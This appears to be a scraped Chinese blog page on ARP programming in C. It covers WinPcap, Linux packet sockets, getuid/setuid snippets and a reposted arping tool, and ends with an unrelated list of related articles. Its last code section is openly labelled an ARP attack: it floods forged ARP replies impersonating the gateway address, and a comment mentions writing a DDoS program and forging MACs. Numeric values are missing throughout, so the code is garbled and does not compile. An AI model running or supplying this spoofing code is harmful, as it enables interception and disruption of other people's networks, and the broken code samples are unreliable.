c语言ARP应用
对于windows环境,winsock不能用来发ARP请求:
发表于: 2002-04-23 11:45:12
arp是请求硬件地址的。winsock层次太高啦。。。
用winsock中的sendto函数,将其中的buf填入arp请求的分组格式,为什么不行呢?
用WinSock是不能发ARP包的,WinSock只能发IP包,
要发ARP包必须要用链路层的接口,因为必须告诉链路层的接口你的帧类型为ARP而不是IP
winpcap
winpcap(windows packet capture)是windows平台下一个免费,公共的网络访问系统。
开发winpcap这个项目的目的在于为win32应用程序提供访问网络底层的能力。
WinPcap是用于网络封包抓取的一套工具,可适用于32/64位的操作平台上解析网络封包,
包含了核心的封包过滤,一个底层动态链接库,和一个高层系统函数库,及可用来直接存取封包的应用程序界面。
Winpcap是一个免费公开的软件系统。它用于windows系统下的直接的网络编程
Linux提供最常用的网络通信应用程序开发接口--Berkerley套接字(Socket).
Linux系统提供的基于数据链路层开发应用程序的接口集成在套接字中,
它是通过创建packet类型的套接宇.使应用程序可直接在数据链路层接
收或发送 未被系统处理的原始的数据报文(如ARP报文),用户也可以使
用packet类型的套接宇在物理层上定义自己特殊的网络协议。只有注册
号为0的用户(超级 用户)进程才能建立或打开用于访问网络低层的套接字.
设置网卡为混杂模式,地址结果相关分析:http://blog.csdn.net/cyx1743/article/details/6687771
相关数据结构、函数:
uid_t getuid(void);
它通常是一个小整形。函数返回一个调用程序的真实用户ID,一般来说,这个函数都是会调用成功的。
#include<stdio.h>
#include<stdlib.h>
#include <sys/types.h>
#include <pwd.h>
#include <stdio.h>
#include <unistd.h>
int main()
{
uid_t uid;
uid = getuid();
printf("User IDs: uid=%d\n", uid);
exit();
}
int setuid(uid_t uid);
设置实际用户id和有效用户id
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
int main()
{
if(!setuid()){
printf("setuid successfully!\n");
}else{
printf("setuid error!");
perror("setuid");
}
return ;
}
hostent
struct hostent{
getsockname()
它用于一个已捆绑或已连接套接字s,本地地址将被返回。
本调用特别适用于如下情况:未调用bind()就调用了connect(),这时唯有getsockname()调用可以获知系统内定的本地地址。
在返回时,namelen参数包含了名字的实际字节数。
//ARP协议的C语言实现源代码【转载】 收藏
//什么是ARP协议
//英文原义:ADDRESS RESOLUTION PROTOCOL
//中文释义:(RFC - 826)地址解析协议 #include <netdb.h>
#include <unistd.h>
#include <ctype.h>
#include <errno.h>
#include <signal.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <getopt.h>
#include <sys/uio.h>
#include <sys/file.h>
#include <sys/time.h>
#include <sys/signal.h>
#include <sys/ioctl.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <linux/sockios.h>
#include <linux/if.h>
#include <linux/if_arp.h>
#include <linux/if_packet.h>
#include <linux/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define src_addr "192.168.0.239" //需要进行arp解析的ip
#define device "eth0" //本机的哪块网卡
#define fill_buf "aaaaaaaaaaaa"
int socket_id;
char *target = src_addr;
int send_count = ;
int recv_count = ;
struct in_addr src, dst;
struct sockaddr_ll me, he;
struct timeval send_time, recv_time;
struct in_addr get_src_ip(char * devices)//获得本机相应网卡的ip
{
struct sockaddr_in saddr;
int sock_id = socket(AF_INET, SOCK_DGRAM, );//设置数据报socket
if (sock_id < ) {
perror("socket");
exit();
}
if (devices) {
if (setsockopt(sock_id, SOL_SOCKET, SO_BINDTODEVICE, device, strlen(device) + ) == -)//将socketbind到网卡上
perror("WARNING: interface is ignored");
}
int alen = sizeof(saddr);
memset(&saddr, , sizeof(saddr));
saddr.sin_port = htons(0x1000);//设置端口
saddr.sin_family = AF_INET;
if (connect(sock_id, (struct sockaddr*)&saddr, sizeof(saddr)) == -) {//将socket连接到相应的inet地址上
perror("connect");
exit();
}
if (getsockname(sock_id, (struct sockaddr*)&saddr, &alen) == -) {//通过socket获得绑定的ip地址
perror("getsockname");
exit();
}
close(sock_id);
return saddr.sin_addr;
}
int check_device(char* if_dev, int ss)//网卡和socket 将网卡设置为混杂模式?
{
int ifindex;
struct ifreq ifr;
memset(&ifr, , sizeof(ifr));
strncpy(ifr.ifr_name, if_dev, IFNAMSIZ - );//网卡设备名
if (ioctl(ss, SIOCGIFINDEX, &ifr) < ) {
fprintf(stderr, "arping: unknown iface %s\n", if_dev);
exit();
}
ifindex = ifr.ifr_ifindex;
if (ioctl(ss, SIOCGIFFLAGS, (char*)&ifr)) {
perror("ioctl(SIOCGIFFLAGS)");
exit();
}
if (!(ifr.ifr_flags&IFF_UP)) {
printf("Interface \"%s\" is down\n", if_dev);
exit();
}
if (ifr.ifr_flags&(IFF_NOARP | IFF_LOOPBACK)) {
printf("Interface \"%s\" is not ARPable\n", if_dev);
exit();
}
return ifindex;
} // check_device() int socket_init()
{
int s, s_errno;
s = socket(PF_PACKET, SOCK_DGRAM, );//数据包
s_errno = errno;
me.sll_family = AF_PACKET;
me.sll_ifindex = check_device(device, s);
me.sll_protocol = htons(ETH_P_ARP);
if (bind(s, (struct sockaddr*)&me, sizeof(me)) == -) {
perror("bind");
exit();
}
int alen = sizeof(me);
if (getsockname(s, (struct sockaddr*)&me, &alen) == -) {
perror("getsockname");
exit();
}
if (me.sll_halen == ) {
printf("Interface \"%s\" is not ARPable (no ll address)\n", device);
exit();
}
he = me;
memset(he.sll_addr, -, he.sll_halen); // set dmac addr FF:FF:FF:FF:FF:FF
return s;
}
int
create_pkt(unsigned char * buf, struct in_addr src, struct in_addr dst, struct sockaddr_ll * FROM, struct sockaddr_ll * TO)
{
struct arphdr *ah = (struct arphdr*) buf;
unsigned char *p = (unsigned char *)(ah + );
ah->ar_hrd = htons(FROM->sll_hatype);
if (ah->ar_hrd == htons(ARPHRD_FDDI))
ah->ar_hrd = htons(ARPHRD_ETHER);
ah->ar_pro = htons(ETH_P_IP);
ah->ar_hln = FROM->sll_halen;
ah->ar_pln = ;
ah->ar_op = htons(ARPOP_REQUEST);
memcpy(p, &FROM->sll_addr, ah->ar_hln);
p += FROM->sll_halen;
memcpy(p, &src, );
p += ;
memcpy(p, &TO->sll_addr, ah->ar_hln);
p += ah->ar_hln;
memcpy(p, &dst, );
p += ;
memcpy(p, fill_buf, strlen(fill_buf));
p += ;
return (p - buf);
}
void send_pkt()
{
unsigned char send_buf[];
int pkt_size = create_pkt(send_buf, src, dst, &me, &he);
gettimeofday(&send_time, NULL);
int cc = sendto(socket_id, send_buf, pkt_size, , (struct sockaddr*)&he, sizeof(he));
if (cc == pkt_size)
send_count++;
alarm();
}
int chk_recv_pkt(unsigned char * buf, struct sockaddr_ll * FROM)//解析arp数据
{
struct arphdr *ah = (struct arphdr*)buf;
unsigned char *p = (unsigned char *)(ah + );
struct in_addr src_ip, dst_ip;
if (ah->ar_op != htons(ARPOP_REQUEST) && ah->ar_op != htons(ARPOP_REPLY))
return ;
if (ah->ar_pro != htons(ETH_P_IP) || ah->ar_pln != || ah->ar_hln != me.sll_halen)
return ;
memcpy(&src_ip, p + ah->ar_hln, );
memcpy(&dst_ip, p + ah->ar_hln + + ah->ar_hln, );
if (src_ip.s_addr != dst.s_addr || src.s_addr != dst_ip.s_addr)
return ;
return (p - buf);
}
void disp_info(int received, struct in_addr dst, int msecs, int usecs, struct sockaddr_ll from)
{
printf("%03d ", received);
printf("%s ", from.sll_pkttype == PACKET_HOST ? "Unicast" : "Broadcast");
printf("%s from %s", "reply", inet_ntoa(dst));
printf(" [%02X:%02X:%02X:%02X:%02X:%02X] ", from.sll_addr[], from.sll_addr[], \
from.sll_addr[], from.sll_addr[], from.sll_addr[], from.sll_addr[]);
printf(" %ld.%ld ms\n", (long int)msecs, (long int)usecs);
fflush(stdout);
}
void finish()
{
printf("\nSent %d ARP probe packet(s) \n", send_count);
printf("Received %d response(s)", recv_count);
printf("\n\n");
fflush(stdout);
exit(!recv_count);
}
////////////////////////////////////////////////////////////////
int
main(int argc, char **argv)
{
uid_t uid = getuid();
setuid(uid);
if (*(argv + ) != NULL)
target = *(argv + );//传入的第一个参数,待解析的ip地址
if (inet_aton(target, &dst) != ) {//使用字符串ip更新dst地址结构中的网络字节序ip
struct hostent *hp;
hp = gethostbyname2(target, AF_INET);
printf("\ntarget = %s \n", target);
if (!hp) {
fprintf(stderr, "arping: unknown host %s\n", target);
exit();
}
memcpy(&dst, hp->h_addr, );
}
src = get_src_ip(device);//获得本机device网卡的ip
if (!src.s_addr) {
fprintf(stderr, "arping: no source address in not-DAD mode\n");
exit();
}
socket_id = socket_init();
printf("\nARPING %s ", inet_ntoa(dst));
printf("from %s %s\n\n", inet_ntoa(src), device ? : "");
signal(SIGINT, finish);
signal(SIGALRM, send_pkt);
send_pkt();
while ()
{
struct sockaddr_ll from;
int alen = sizeof(from);
char recv_buf[0x1000]; int recv_size = recvfrom(socket_id, recv_buf, sizeof(recv_buf), , (struct sockaddr *)&from, &alen); gettimeofday(&recv_time, NULL);
if (recv_size < ) {
perror("arping: recvfrom");
continue;
}
if (chk_recv_pkt(recv_buf, &from) > ) {
memcpy(he.sll_addr, from.sll_addr, he.sll_halen);
long usecs, msecs;
if (recv_time.tv_sec) {
usecs = (recv_time.tv_sec - send_time.tv_sec) * + recv_time.tv_usec - send_time.tv_usec;
msecs = (usecs + ) / ;
usecs -= msecs * - ;
}
recv_count++;
disp_info(recv_count, dst, msecs, usecs, from);
} // if (chk...) }
return ;
}
linux下使用libnet实现ARP攻击(转)
http://my.oschina.net/jiyufei/blog/179494
#include "arp.h" int main(int argc,char **argv){
libnet_t *l;
int i,packet_size; //发送的数据包的长度
libnet_ptag_t arp_tag,ether_tag;
char *device="eth0";
char err_buf[LIBNET_ERRBUF_SIZE];
char *destion_ip_str = "255.255.255.255";
char *source_ip_str = "192.168.1.1";
u_char source_hardware[]={0x00,0x0c,0x29,0x68,0x95,0x84};
u_char destion_hardware[]={0xff,0xff,0xff,0xff,0xff,0xff};
u_int32_t source_ip,destion_ip;
//将字符形式ip转换为网络字节序
source_ip = libnet_name2addr4(l,source_ip_str,LIBNET_RESOLVE);
destion_ip = libnet_name2addr4(l,destion_ip_str,LIBNET_RESOLVE);
//初始化libnet句柄
l = libnet_init(LIBNET_LINK,device,err_buf);
if(l == NULL){
printf("初始化libnet句柄失败:%s\n",err_buf);
exit(-);
}
arp_tag = libnet_build_arp(
ARPHRD_ETHER, //硬件地址类型,此处为以太网类型
ETHERTYPE_IP, //协议地址类型
,
,
ARPOP_REPLY, //ARP应答
source_hardware,
(u_int8_t *)&source_ip,
destion_hardware,
(u_int8_t *)&destion_ip,
NULL, //无负载
, //负载长度为0
l,
//协议块标记,为0,表示新建协议块
);
ether_tag = libnet_build_ethernet(
(u_int8_t *)&destion_hardware,
(u_int8_t *)&source_hardware,
ETHERTYPE_ARP,
NULL,
,
l, );
i = ;
while(){
packet_size = libnet_write(l); //发送构造的ARP数据包
usleep();
i++;
}
printf("数据包长度为:%d\n",packet_size);
libnet_destroy(l);
return ;
} /*目标MAC为广播地址,全0xff就行,源MAC地址可以为本机MAC或者随便伪造的MAC
(在程序中获取本机MAC可用ioctl函数,最近在写DDOS攻击程序就是用ioctl获取本机MAC和IP的),注意ARP包类型为ARPOP_REPLY(应答包)。*/
也是libnet的arp,结合了校园网:http://bbs.csdn.net/topics/360266138
c语言ARP应用的更多相关文章
- c语言Winpcap编程构造并接收解析arp包
/* 程序功能: 1.构造arp包,并发送.程序参数顺序:源IP.目的IP.mac地址.flag 2.获取网络中的ARP数据包,解析数据包的内容.程序参数:日志文件名 winpacp中文技术文档(基本 ...
- 基于ARP的局域网IP劫持——C语言实现
我站在 烈烈风中 恨不能 荡尽绵绵心痛 望苍天 四方云动 剑在手 问天下谁是英雄 ——<霸王别姬> 阅读这篇文章之前,请确认已经熟悉ARP报文伪造的方法,可参考< ...
- 伯克利包过滤(Berkeley Packet Filter,BPF)语言
libpcap支持一种功能非常强大的过滤语言——“伯克利包过滤”语法.使用BPF过滤规则,你可以确定该获取和检查哪些流量,忽略哪些流量.BPF让你能够通过比较第2.3.4层协议中各个数据字段值的方法对 ...
- C语言面试题汇总之一
C语言面试题汇总之一 1.static有什么用途?(请至少说明两种) l 限制变量的作用域: 设置变量的存储域. 2.引用和指针有什么区别? 引用必须被初始化,指针不必: 引用初始化以后不能被改变,指 ...
- C/C++学习----使用C语言代替cmd命令、cmd命令大全
[开发环境] 物理机版本:Win 7 旗舰版(64位) IDE版本:Visual Studio 2013简体中文旗舰版(cn_visual_studio_ultimate_2013_with_upda ...
- ARP:地址解析协议
ARP是地址解析协议,简单语言解释一下工作原理.1:首先,每个主机都会在自己的ARP缓冲区中建立一个ARP列表,以表示IP地址和MAC地址之间的对应关系.2:当源主机要发送数据时,首先检查ARP列表中 ...
- 华为C语言笔试题集合
①华为笔试题搜集 1.static有什么用途?(请至少说明两种) 1)在函数体,一个被声明为静态的变量在这一函数被调用过程中维持其值不变. 2) 在模块内(但在函数体外),一个被声明为 ...
- C语言面试题大汇总
static有什么用途?(请至少说明两种)1.限制变量的作用域2.设置变量的存储域7. 引用与指针有什么差别?1) 引用必须被初始化,指针不必.2) 引用初始化以后不能被改变,指针能够改变所指的对象. ...
- 转 C语言面试题大汇总
转 C语言面试题大汇总,个人觉得还是比较全地!!! \主 题: C语言面试题大汇总,个人觉得还是比较全地!!! 作 者: free131 (白日?做梦!) 信 誉 值: 100 ...
随机推荐
- groovy http
import groovy.json.JsonOutput void api(){ def data = [jobId : "11111111111111", data : 5,s ...
- Oracle 物理结构(三) 文件-参数文件
一.参数文件介绍 Oracle中的参数文件是一个包含一系列参数以及参数对应值的操作系统文件.它们是在数据库实例启动时候加载的, 决定了数据库的物理 结构.内存.数据库的限制及系统大量的默认值.数据库的 ...
- vue中使用ckeditor,支持wps,word,网页粘贴
由于工作需要必须将word文档内容粘贴到编辑器中使用 但发现word中的图片粘贴后变成了file:///xxxx.jpg这种内容,如果上传到服务器后其他人也访问不了,网上找了很多编辑器发现没有一个能直 ...
- WEB自动化测试(UFT与Selenium)课程及视频教程
自动化测试UFT与Selenium详细视频教程科目如下: 1.自动化测试基础-2.UFT自动化测试详解-3.UFT高级测试开发-4.自动化测试框架设计-5.UFT综合实战-6自动化测试-Seleniu ...
- P2051 [AHOI2009]中国象棋——DP(我是谁,我在哪,为什么)
象棋,给你棋盘大小,然后放炮(炮的数量不限),不能让炮打到其他的炮,问方案数: 数据n,m<=200; 状态压缩似乎能做,但是我不会: 因为只要状态数,所以不必纠结每种状态的具体情况: 可以想出 ...
- Linux监控工具介绍系列——iostat
文章转自:https://www.cnblogs.com/ghj1976/p/5691857.html Linux系统中的 iostat是I/O statistics(输入/输出统计)的缩写,iost ...
- Geos判断点是否在多边形内
使用的geo版本是3.5.1 #include <iostream> #include "geos.h" using namespace std; GeometryFa ...
- MySQL优化:如何避免回表查询?什么是索引覆盖? (转)
数据库表结构: create table user ( id int primary key, name varchar(20), sex varchar(5), index(name) )engin ...
- docker 容器内部访问宿主机
在宿主机执行: ifconfig 然后查看 docker0 的那个网卡的 ip 地址,比如我的是 172.18.0.1
- AcFun 的视频架构演化实践——阅读心得
视频的核心技术栈 AcFun 弹幕视频网(acfun.tv)是中国最早上线的弹幕视频网站,也是最具影响力的弹幕视频平台.“AcFun”原取意于“AnimeComic Fun”.自2007年6月6日成立 ...